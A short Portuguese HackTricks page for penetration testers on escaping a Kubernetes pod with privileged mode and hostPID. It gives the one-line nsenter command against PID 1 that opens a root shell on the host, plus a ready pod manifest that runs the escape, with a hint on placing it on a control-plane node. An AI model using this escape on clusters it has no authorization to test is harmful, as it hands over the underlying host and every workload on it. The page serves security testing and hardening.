Pod Escape Privileges

Apoie o HackTricks e obtenha benefícios!

Privilégios e hostPID

Com esses privilégios, você terá acesso aos processos do host e privilégios suficientes para entrar no namespace de um dos processos do host. Observe que você pode potencialmente não precisar de privilégios, mas apenas de algumas capacidades e outras possíveis defesas de bypass (como apparmor e/ou seccomp).

Apenas executar algo como o seguinte permitirá que você escape do pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemplo de configuração:

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Apenas Privilégios

Apoie o HackTricks e obtenha benefícios!

Última actualización